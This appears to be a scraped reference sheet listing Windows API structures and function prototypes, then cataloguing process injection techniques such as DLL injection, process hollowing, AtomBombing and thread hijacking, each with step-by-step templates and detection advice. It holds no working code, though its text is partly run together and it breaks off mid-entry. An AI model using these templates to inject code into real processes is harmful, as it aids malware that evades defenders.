size_t count
); // Copies at most count characters from the wide string src to dest.[wcscat]
wchar_t *wcscat(
wchar_t *dest,
const wchar_t *src
); // Appends the wide string src to the end of the wide string dest.[wcsncat]
wchar_t *wcsncat(
wchar_t *dest,
const wchar_t *src,
size_t count
); // Appends at most count characters from the wide string src to the end of the wide string dest.[wcscmp]
int wcscmp(
const wchar_t *str1,
const wchar_t *str2
); // Compares two wide strings lexicographically.[wcsncmp]
int wcsncmp(
const wchar_t *str1,
const wchar_t *str2,
size_t count
); // Compares up to count characters of two wide strings lexicographically.[_wcsicmp]
int _wcsicmp(
const wchar_t *str1,
const wchar_t *str2
); // Compares two wide strings lexicographically, ignoring case.[_wcsnicmp]
int _wcsnicmp(
const wchar_t *str1,
const wchar_t *str2,
size_t count
); // Compares up to count characters of two wide strings lexicographically, ignoring case.[wcschr]
wchar_t *wcschr(
const wchar_t *str,
wchar_t c
); // Finds the first occurrence of the wide character c in the wide string str.[wcsrchr]
wchar_t *wcsrchr(
const wchar_t *str,
wchar_t c
); // Finds the last occurrence of the wide character c in the wide string str.[wcspbrk]
wchar_t *wcspbrk(
const wchar_t *str1,
const wchar_t *str2
); // Finds the first occurrence in the wide string str1 of any character from the wide string str2.[wcsstr]
wchar_t *wcsstr(
const wchar_t *str1,
const wchar_t *str2
); // Finds the first occurrence of the wide string str2 in the wide string str1.[wcstok]
wchar_t *wcstok(
wchar_t *str,
const wchar_t *delimiters
); // Splits the wide string str into tokens based on the delimiters.[towupper]
wint_t towupper(
wint_t c
); // Converts a wide character to uppercase.[towlower]
wint_t towlower(
wint_t c
); // Converts a wide character to lowercase.[iswalpha]
int iswalpha(
wint_t c
); // Checks if the wide character is an alphabetic character.[iswdigit]
int iswdigit(
wint_t c
); // Checks if the wide character is a decimal digit.[iswalnum]
int iswalnum(
wint_t c
); // Checks if the wide character is an alphanumeric character.[iswspace]
int iswspace(
wint_t c
); // Checks if the wide character is a whitespace character.[iswxdigit]
int iswxdigit(
wint_t c
); // Checks if the wide character is a valid hexadecimal digit.#include <sysinfoapi.h>
// Contains information about the current computer system, including the architecture and type of the processor, the number of processors, and the page size.
typedef struct _SYSTEM_INFO {
union {
DWORD dwOemId;
struct {
WORD wProcessorArchitecture;
WORD wReserved;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
DWORD dwPageSize;
LPVOID lpMinimumApplicationAddress;
LPVOID lpMaximumApplicationAddress;
DWORD_PTR dwActiveProcessorMask;
DWORD dwNumberOfProcessors;
DWORD dwProcessorType;
DWORD dwAllocationGranularity;
WORD wProcessorLevel;
WORD wProcessorRevision;
} SYSTEM_INFO;#include <minwinbase.h>
// Represents the number of 100-nanosecond intervals since January 1, 1601 (UTC). Used for file and system time.
typedef struct _FILETIME {
DWORD dwLowDateTime;
DWORD dwHighDateTime;
} FILETIME;#include <processthreadsapi.h>
// Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time.
typedef struct _STARTUPINFOA {
DWORD cb;
LPSTR lpReserved;
LPSTR lpDesktop;
LPSTR lpTitle;
DWORD dwX;
DWORD dwY;
DWORD dwXSize;
DWORD dwYSize;
DWORD dwXCountChars;
DWORD dwYCountChars;
DWORD dwFillAttribute;
DWORD dwFlags;
WORD wShowWindow;
WORD cbReserved2;
LPBYTE lpReserved2;
HANDLE hStdInput;
HANDLE hStdOutput;
HANDLE hStdError;
} STARTUPINFOA, *LPSTARTUPINFOA;#include <processthreadsapi.h>
// Contains information about a newly created process and its primary thread.
typedef struct _PROCESS_INFORMATION {
HANDLE hProcess;
HANDLE hThread;
DWORD dwProcessId;
DWORD dwThreadId;
} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;#include <tlhelp32.h>
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
ULONG_PTR th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
CHAR szExeFile[MAX_PATH];
} PROCESSENTRY32;// Determines whether the handle can be inherited by child processes and specifies a security descriptor for a new object.
typedef struct _SECURITY_ATTRIBUTES {
DWORD nLength;
LPVOID lpSecurityDescriptor;
BOOL bInheritHandle;
} SECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;#inluce <minwinbase.h>
// Contains information used in asynchronous (also known as overlapped) input and output (I/O) operations.
typedef struct _OVERLAPPED {
ULONG_PTR Internal;
ULONG_PTR InternalHigh;
union {
struct {
DWORD Offset;
DWORD OffsetHigh;
} DUMMYSTRUCTNAME;
PVOID Pointer;
} DUMMYUNIONNAME;
HANDLE hEvent;
} OVERLAPPED, *LPOVERLAPPED;#include <guiddef.h>
// Represents a globally unique identifier (GUID), used to identify objects, interfaces, and other items.
typedef struct _GUID {
unsigned long Data1;
unsigned short Data2;
unsigned short Data3;
unsigned char Data4[8];
} GUID;#include <winnt.h>
// Contains information about a range of pages in the virtual address space of a process.
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress;
PVOID AllocationBase;
DWORD AllocationProtect;
SIZE_T RegionSize;
DWORD State;
DWORD Protect;
DWORD Type;
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;#include <minwinbase.h>
// Specifies a date and time, using individual members for the month, day, year, weekday, hour, minute, second, and millisecond.
typedef struct _SYSTEMTIME {
WORD wYear;
WORD wMonth;
WORD wDayOfWeek;
WORD wDay;
WORD wHour;
WORD wMinute;
WORD wSecond;
WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME, *LPSYSTEMTIME;// Defines the coordinates of a character cell in a console screen buffer, where the origin (0,0) is at the top-left corner.
typedef struct _COORD {
SHORT X;
SHORT Y;
} COORD, *PCOORD;// Defines the coordinates of the upper left and lower right corners of a rectangle.
typedef struct _SMALL_RECT {
SHORT Left;
SHORT Top;
SHORT Right;
SHORT Bottom;
} SMALL_RECT;// Contains information about a console screen buffer.
typedef struct _CONSOLE_SCREEN_BUFFER_INFO {
COORD dwSize;
COORD dwCursorPosition;
WORD wAttributes;
SMALL_RECT srWindow;
COORD dwMaximumWindowSize;
} CONSOLE_SCREEN_BUFFER_INFO, *PCONSOLE_SCREEN_BUFFER_INFO;#include <winsock.h>
// Contains information about the Windows Sockets implementation.
typedef struct WSAData {
WORD wVersion;
WORD wHighVersion;
unsigned short iMaxSockets;
unsigned short iMaxUdpDg;
char FAR *lpVendorInfo;
char szDescription[WSADESCRIPTION_LEN+1];
char szSystemStatus[WSASYS_STATUS_LEN+1];
} WSADATA, *LPWSADATA;[CRITICAL_SECTION](struct RTL_CRITICAL_SECTION (nirsoft.net))
// Represents a critical section object, which is used to provide synchronization access to a shared resource.
typedef struct _RTL_CRITICAL_SECTION {
PRTL_CRITICAL_SECTION_DEBUG DebugInfo;
LONG LockCount;
LONG RecursionCount;
HANDLE OwningThread;
HANDLE LockSemaphore;
ULONG_PTR SpinCount;
} RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;#include <winsock2.h>
// Contains Windows Sockets protocol information.
typedef struct _WSAPROTOCOL_INFOA {
DWORD dwServiceFlags1;
DWORD dwServiceFlags2;
DWORD dwServiceFlags3;
DWORD dwServiceFlags4;
DWORD dwProviderFlags;
GUID ProviderId;
DWORD dwCatalogEntryId;
WSAPROTOCOLCHAIN ProtocolChain;
int iVersion;
int iAddressFamily;
int iMaxSockAddr;
int iMinSockAddr;
int iSocketType;
int iProtocol;
int iProtocolMaxOffset;
int iNetworkByteOrder;
int iSecurityScheme;
DWORD dwMessageSize;
DWORD dwProviderReserved;
CHAR szProtocol[WSAPROTOCOL_LEN+1];
} WSAPROTOCOL_INFOA, *LPWSAPROTOCOL_INFOA;#include <ws2def.h>
// Contains message information for use with the `sendmsg` and `recvmsg` functions.
typedef struct _WSAMSG {
LPSOCKADDR name;
INT namelen;
LPWSABUF lpBuffers;
ULONG dwBufferCount;
WSABUF Control;
ULONG dwFlags;
} WSAMSG, *PWSAMSG, *LPWSAMSG;// A generic socket address structure used for compatibility with various address families.
typedef struct sockaddr {
u_short sa_family;
char sa_data[14];
} SOCKADDR, *PSOCKADDR, *LPSOCKADDR;// Represents an IPv4 socket address, containing the IPv4 address, port number, and address family.
typedef struct sockaddr_in {
short sin_family;
u_short sin_port;
struct in_addr sin_addr;
char sin_zero[8];
} SOCKADDR_IN, *PSOCKADDR_IN, *LPSOCKADDR_IN;// Used to set the socket option SO_LINGER, which determines the action taken when unsent data is queued on a socket and a `closesocket` is performed.
typedef struct linger {
u_short l_onoff;
u_short l_linger;
} LINGER, *PLINGER, *LPLINGER;// Represents a time interval, used with the `select` function to specify a timeout period.
typedef struct timeval {
long tv_sec;
long tv_usec;
} TIMEVAL, *PTIMEVAL, *LPTIMEVAL;// Represents a set of sockets used with the `select` function to check for socket events.
typedef struct fd_set {
u_int fd_count;
SOCKET fd_array[FD_SETSIZE];
} fd_set, *Pfd_set, *LPfd_set;// Represents an IPv4 address.
typedef struct in_addr {
union {
struct {
u_char s_b1, s_b2, s_b3, s_b4;
} S_un_b;
struct {
u_short s_w1, s_w2;
} S_un_w;
u_long S_addr;
} S_un;
} IN_ADDR, *PIN_ADDR, *LPIN_ADDR;#include <ws2def.h>
// Contains information about an address for use with the `getaddrinfo` function, and is used to build a linked list of addresses.
typedef struct addrinfoW {
int ai_flags;
int ai_family;
int ai_socktype;
int ai_protocol;
size_t ai_addrlen;
PWSTR *ai_canonname;
struct sockaddr *ai_addr;
struct addrinfo *ai_next;
} ADDRINFOW, *PADDRINFOW;#include <ws2def.h>
// Contains a pointer to a buffer and its length. Used for scatter/gather I/O operations.
typedef struct _WSABUF {
ULONG len;
__field_bcount(len) CHAR FAR *buf;
} WSABUF, FAR * LPWSABUF;#include <ws2ipdef.h>
// Represents an IPv6 socket address, containing the IPv6 address, port number, flow info, and address family.
typedef struct sockaddr_in6 {
short sin6_family;
u_short sin6_port;
u_long sin6_flowinfo;
struct in6_addr sin6_addr;
u_long sin6_scope_id;
} SOCKADDR_IN6, *PSOCKADDR_IN6, *LPSOCKADDR_IN6;#include <in6addr.h>
// Represents an IPv6 address.
typedef struct in6_addr {
union {
u_char Byte[16];
u_short Word[8];
} u;
} IN6_ADDR, *PIN6_ADDR, *LPIN6_ADDR;This technique forces a process to load a malicious DLL.
Key APIs:
OpenProcessHANDLE OpenProcess( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId );
VirtualAllocExLPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
WriteProcessMemoryBOOL WriteProcessMemory( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten );
CreateRemoteThreadHANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
GetProcAddressFARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
LoadLibraryHMODULE LoadLibraryA( LPCSTR lpLibFileName );
NtCreateThread(Undocumented)NTSTATUS NTAPI NtCreateThread( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PINITIAL_TEB InitialTeb, IN BOOLEAN CreateSuspended );
RtlCreateUserThread(Undocumented)NTSTATUS NTAPI RtlCreateUserThread( IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientId );
Template:
- Open the target process with
OpenProcess - Allocate memory in the target process with
VirtualAllocEx - Write the DLL path to the allocated memory with
WriteProcessMemory - Get the address of
LoadLibraryAusingGetProcAddress - Create a remote thread in the target process with
CreateRemoteThread, pointing toLoadLibraryApass the address ofLoadLibraryAas thelpStartAddressparameter. - (Optional) Use
NtCreateThreadorRtlCreateUserThreadfor alternative thread creation methods
Detection and Defense:
- Monitor for suspicious process access and memory allocation patterns
- Use application whitelisting to prevent unauthorized DLLs from loading
- Implement process integrity checks
- Use tools like Microsoft's Process Monitor to detect DLL injection attempts
This technique involves writing and executing malicious code in a remote process or the same process (self-injection).
Key APIs:
OpenThreadHANDLE OpenThread( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId );
SuspendThreadDWORD SuspendThread( HANDLE hThread );
VirtualAllocEx(see above)WriteProcessMemory(see above)SetThreadContextBOOL SetThreadContext( HANDLE hThread, const CONTEXT *lpContext );
ResumeThreadDWORD ResumeThread( HANDLE hThread );
NtResumeThread(Undocumented)NTSTATUS NTAPI NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG PreviousSuspendCount OPTIONAL );
Template:
- Open the target thread with
OpenThread - Suspend the thread with
SuspendThread - Allocate memory in the target process with
VirtualAllocEx - Write the malicious code to the allocated memory with
WriteProcessMemory - Modify the thread context to point to the injected code with
SetThreadContext - Resume the thread with
ResumeThreadorNtResumeThread
Detection and Defense:
- Monitor for unusual thread suspension and resumption patterns
- Implement memory integrity checks
- Use Endpoint Detection and Response (EDR) solutions to detect suspicious memory modifications
- Employ runtime process memory scanning techniques
Similar to PE Injection but avoids using LoadLibrary and CreateRemoteThread. Involves writing a custom loader that can load a DLL from memory without using the standard Windows loader.
Key APIs:
CreateFileMappingHANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
MapViewOfFileLPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
OpenProcess(see above)memcpyvoid *memcpy( void *dest, const void *src, size_t count );
ZwMapViewOfSection(Documented for kernel-mode)NTSTATUS ZwMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
CreateThread(see CreateRemoteThread above)NtQueueApcThread(Undocumented)NTSTATUS NTAPI NtQueueApcThread( IN HANDLE ThreadHandle, IN PIO_APC_ROUTINE ApcRoutine, IN PVOID ApcRoutineContext OPTIONAL, IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, IN ULONG ApcReserved OPTIONAL );
RtlCreateUserThread(see above)
Additional APIs sometimes used:
VirtualQueryExSIZE_T VirtualQueryEx( HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength );
ReadProcessMemoryBOOL ReadProcessMemory( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead );
Template:
- Create a file mapping of the DLL with
CreateFileMapping - Map a view of the file with
MapViewOfFile - Open the target process with
OpenProcess - Allocate memory in the target process with
VirtualAllocEx - Copy the DLL contents to the allocated memory with
WriteProcessMemory - Perform manual loading and relocation of the DLL in the target process
- Parse the PE headers
- Allocate memory for each section
- Copy sections to allocated memory
- Process the relocation table:
- Enumerate relocation entries
- Apply relocations based on the new base address
- Resolve imports:
- Walk the import directory
- For each imported function, resolve its address using GetProcAddress
- Write the resolved addresses to the IAT
- Execute the DLL's entry point using one of the thread creation methods
Detection and Defense:
- Implement advanced memory scanning techniques to detect injected code
- Use behavior-based detection to identify suspicious memory allocation patterns
- Monitor for unusual file mapping operations
- Employ heuristic-based detection methods to identify reflective loaders
This technique allows code execution in a specific thread by attaching to an Asynchronous Procedure Call (APC) queue. Works best with alertable threads (those that call alertable wait functions).
Key APIs:
CreateToolhelp32SnapshotHANDLE CreateToolhelp32Snapshot( DWORD dwFlags, DWORD th32ProcessID );
Process32FirstBOOL Process32First( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
Process32NextBOOL Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
Thread32FirstBOOL Thread32First( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
Thread32NextBOOL Thread32Next( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
QueueUserAPCDWORD QueueUserAPC( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
KeInitializeAPC(Kernel-mode, undocumented)VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
Template:
- Create a snapshot of the system processes with
CreateToolhelp32Snapshot - Enumerate processes and threads using
Process32First,Process32Next,Thread32First, andThread32Next - Open the target process with
OpenProcess - Allocate memory in the target process with
VirtualAllocEx - Write the malicious code to the allocated memory with
WriteProcessMemory - Queue an APC to the target thread with
QueueUserAPC, pointing to the injected code
Detection and Defense:
- Monitor for suspicious APC queue operations
- Implement thread execution monitoring to detect unexpected code execution
- Use EDR solutions with capabilities to detect APC abuse
- Employ runtime analysis to identify unusual thread behavior
This technique "drains out" the entire content of a process and inserts malicious content into it.
Key APIs:
CreateProcessBOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
NtQueryInformationProcess(Undocumented)NTSTATUS NTAPI NtQueryInformationProcess( IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL );
GetModuleHandleHMODULE GetModuleHandleA( LPCSTR lpModuleName );
ZwUnmapViewOfSection/NtUnmapViewOfSection(Undocumented)NTSTATUS NTAPI NtUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
VirtualAllocEx(see above)WriteProcessMemory(see above)GetThreadContextBOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );
SetThreadContext(see above)ResumeThread(see above)
Template:
- Create a new process in a suspended state using
CreateProcesswithCREATE_SUSPENDEDflag - Get the process information using
NtQueryInformationProcess - Unmap the original executable from the process using
NtUnmapViewOfSectionafter unmapping the original executable, adjust the image base address in the PEB (Process Environment Block) to point to the new allocated memory. - Adjust the image base address in the PEB:
- Use
ReadProcessMemoryto read the PEB - Locate the
ImageBaseAddressfield - Use
WriteProcessMemoryto update it with the address of the newly allocated memory
- Allocate memory in the target process with
VirtualAllocEx - Write the malicious executable to the allocated memory with
WriteProcessMemory - Update the thread context to point to the new entry point using
GetThreadContextandSetThreadContext - Resume the main thread of the process with
ResumeThread
Detection and Defense:
- Implement process integrity checks to detect hollowed processes
- Monitor for suspicious process creation patterns, especially with the
CREATE_SUSPENDEDflag - Use memory forensics tools to identify signs of process hollowing
- Employ behavior-based detection to identify processes with unexpected memory layouts
A variant of APC injection that works by splitting the malicious payload into separate strings and using atoms. this technique relies on the fact that atoms are shared across processes.
Key APIs:
OpenThread(see above)GlobalAddAtomATOM GlobalAddAtomA( LPCSTR lpString );
GlobalGetAtomNameUINT GlobalGetAtomNameA( ATOM nAtom, LPSTR lpBuffer, int nSize );
QueueUserAPC(see above)NtQueueApcThread(Undocumented, see above)NtSetContextThread(Undocumented)NTSTATUS NTAPI NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT ThreadContext );
Template:
- Split the malicious payload into small chunks
- For each chunk, use
GlobalAddAtomto create a global atom - Open the target thread with
OpenThread - Queue an APC to the target thread with
QueueUserAPCorNtQueueApcThread - In the APC routine, use
GlobalGetAtomNameto retrieve the payload chunks - Assemble the payload in the target process memory
- Execute the payload using
NtSetContextThreador by queuing another APC
Detection and Defense:
- Monitor for unusual patterns of atom creation and retrieval
- Implement behavior-based detection for processes accessing a large number of atoms
- Use EDR solutions with capabilities to detect AtomBombing techniques
- Employ runtime analysis to identify suspicious APC usage in combination with atom manipulation
An evolution of Process Hollowing that replaces the image before the process is created. this technique leverages the Windows Transactional NTFS (TxF) to temporarily replace a legitimate file with a malicious one during process creation.
Key APIs:
CreateTransactionHANDLE CreateTransaction( LPSECURITY_ATTRIBUTES lpTransactionAttributes, LPGUID UOW, DWORD CreateOptions, DWORD IsolationLevel, DWORD IsolationFlags, DWORD Timeout, LPWSTR Description );
CreateFileTransactedHANDLE CreateFileTransactedA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter );
NtCreateSection(Undocumented)NTSTATUS NTAPI NtCreateSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL );
NtCreateProcessEx(Undocumented)NTSTATUS NTAPI NtCreateProcessEx( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ParentProcess, IN ULONG Flags, IN HANDLE SectionHandle OPTIONAL, IN HANDLE DebugPort OPTIONAL, IN HANDLE ExceptionPort OPTIONAL, IN BOOLEAN InJob );
NtQueryInformationProcess(Undocumented, see above)NtCreateThreadEx(Undocumented)NTSTATUS NTAPI NtCreateThreadEx( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument OPTIONAL, IN ULONG CreateFlags, IN SIZE_T ZeroBits, IN SIZE_T StackSize, IN SIZE_T MaximumStackSize, IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL );
RollbackTransactionBOOL RollbackTransaction( HANDLE TransactionHandle );
Template:
- Create a transaction using
CreateTransaction - Create a transacted file with
CreateFileTransacted - Write the malicious payload to the transacted file
- Create a section for the transacted file using
NtCreateSection - Create a process from the section using
NtCreateProcessEx - Create a thread in the new process with
NtCreateThreadEx - Rollback the transaction with
RollbackTransactionto remove traces of the malicious file
Detection and Defense:
- Monitor for suspicious transactional NTFS operations
- Implement file integrity monitoring to detect temporary file replacements
- Use advanced EDR solutions capable of detecting Process Doppelgänging techniques
- Employ behavior-based detection to identify processes created from transacted files
Similar to Process Doppelgänging, but exploits the order of process creation and security checks. this technique exploits the fact that Windows performs security checks on the executable file before it starts executing the process.
Key APIs:
CreateFileHANDLE CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
NtCreateSection(Undocumented, see above)NtCreateProcessEx(Undocumented, see above)NtCreateThreadEx(Undocumented, see above)
Template:
- Create a file with
CreateFile - Write the malicious payload to the file
- Create a section for the file using
NtCreateSection - Overwrite the file content with benign data
- Create a process from the section using
NtCreateProcessEx - Create a thread in the new process with
NtCreateThreadEx
Detection and Defense:
- Implement file integrity monitoring to detect rapid changes in executable files
- Use behavior-based detection to identify processes with mismatched file contents
- Employ advanced EDR solutions capable of detecting Process Herpaderping techniques
- Monitor for suspicious patterns of file creation, modification, and process creation
This technique uses hooking-related functions to inject a malicious DLL. this technique can also be used for API hooking, not just for injection.
Key APIs:
SetWindowsHookExHHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
PostThreadMessageBOOL PostThreadMessageA( DWORD idThread, UINT Msg, WPARAM wParam, LPARAM lParam );
Template:
- Create a DLL containing the hook procedure
- Use
SetWindowsHookExto set a hook in the target process - Trigger the hook by sending a message with
PostThreadMessage
Detection and Defense:
- Monitor for suspicious usage of
SetWindowsHookEx, especially with global hooks - Implement API hooking detection mechanisms
- Use EDR solutions with capabilities to detect abnormal hook installations
- Employ behavior-based detection to identify processes with unexpected loaded modules
This technique injects code into a process by using the Extra Windows Memory (EWM), which is appended to the instance of a class during window class registration. less common and might be detected by some security solutions.
Key APIs:
FindWindowAHWND FindWindowA( LPCSTR lpClassName, LPCSTR lpWindowName );
GetWindowThreadProcessIdDWORD GetWindowThreadProcessId( HWND hWnd, LPDWORD lpdwProcessId );
OpenProcess(see above)VirtualAllocEx(see above)WriteProcessMemory(see above)SetWindowLongPtrALONG_PTR SetWindowLongPtrA( HWND hWnd, int nIndex, LONG_PTR dwNewLong );
SendNotifyMessageBOOL SendNotifyMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
Template:
- Find the target window with
FindWindowA - Get the process ID of the window with
GetWindowThreadProcessId - Open the process with
OpenProcess - Allocate memory in the target process with
VirtualAllocEx - Write the malicious code to the allocated memory with
WriteProcessMemory - Use
SetWindowLongPtrAto modify the window's extra memory - Trigger the execution with
SendNotifyMessage
Detection and Defense:
- Monitor for suspicious modifications to window properties
- Implement integrity checks for window class data
- Use EDR solutions with capabilities to detect EWM manipulation
- Employ behavior-based detection to identify processes with unexpected changes in window properties
This technique is used to inject malicious code into processes with medium integrity level, such as explorer.exe. It works by enumerating windows and subclassing them. can be particularly effective for privilege escalation.
Key APIs:
EnumWindowsBOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam );
EnumChildWindowsBOOL EnumChildWindows( HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam );
EnumPropsint EnumPropsA( HWND hWnd, PROPENUMPROCA lpEnumFunc );
GetPropHANDLE GetPropA( HWND hWnd, LPCSTR lpString );
SetWindowSubclassBOOL SetWindowSubclass( HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData );
FindWindow(see above)FindWindowEx(see above)GetWindowThreadProcessId(see above)OpenProcess(see above)ReadProcessMemory(see above)VirtualAllocEx(see above)WriteProcessMemory(see above)SetPropABOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
PostMessageBOOL PostMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
Template:
- Enumerate windows using
EnumWindowsandEnumChildWindows - For each window, check for subclassed windows using
EnumPropsandGetProp - Open the target process with
OpenProcess - Allocate memory in the target process with
VirtualAllocEx - Write the malicious code to the allocated memory with
WriteProcessMemory - Subclass the window using
SetWindowSubclass - Set a new property with
SetPropAto store the payload - Trigger execution by sending a message with
PostMessage
Detection and Defense:
- Monitor for suspicious patterns of window enumeration and subclassing
- Implement integrity checks for window subclassing
- Use EDR solutions with capabilities to detect propagate injection techniques
- Employ behavior-based detection to identify processes with unexpected changes in window subclassing
While not strictly an injection technique, heap spraying is often used in conjunction with other injection methods to facilitate exploit payload delivery. modern browsers and operating systems have implemented mitigations against this.
Key APIs:
HeapAllocLPVOID HeapAlloc( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes );
VirtualAllocLPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
Template:
- Allocate multiple memory blocks using
HeapAllocorVirtualAlloc - Fill these blocks with a combination of NOP sleds and the payload
- Repeat this process to cover a large portion of the process's address space
Detection and Defense:
- Implement memory allocation monitoring to detect suspicious patterns
- Use address space layout randomization (ASLR) to mitigate heap spraying attacks
- Employ EDR solutions with capabilities to detect heap spraying techniques
- Implement browser-specific mitigations, such as randomizing heap allocation
This technique involves suspending a legitimate thread in a target process, modifying its execution context to point to malicious code, and then resuming the thread. saving and restoring the original thread context required to maintain process stability.
Key APIs:
OpenThread(see above)SuspendThread(see above)GetThreadContext(see above)SetThreadContext(see above)VirtualAllocEx(see above)WriteProcessMemory(see above)ResumeThread(see above)
Template:
- Open the target thread with
OpenThread - Suspend the thread with
SuspendThread - Get the thread context with
GetThreadContext - Allocate memory in the target process with
VirtualAllocEx - Write the malicious code to the allocated memory with
WriteProcessMemory - Modify the thread context to point to the injected code with
SetThreadContext - Resume the thread with
ResumeThread
Detection and Defense:
- Monitor for suspicious patterns of thread suspension and resumption
- Implement thread execution monitoring to detect unexpected changes in execution flow
- Use EDR solutions with capabilities to detect thread hijacking techniques
- Employ runtime analysis to identify unusual thread behavior
This technique overwrites the memory of a legitimate module in the target process with malicious code, potentially bypassing some security checks. detected by integrity checks on loaded modules.
Key APIs:
GetModuleInformationBOOL GetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );
VirtualProtectExBOOL VirtualProtectEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
WriteProcessMemory(see above)
Template:
- Open the target process with
OpenProcess - Get information about the target module using
GetModuleInformation - Change the memory protection of the module to writable using
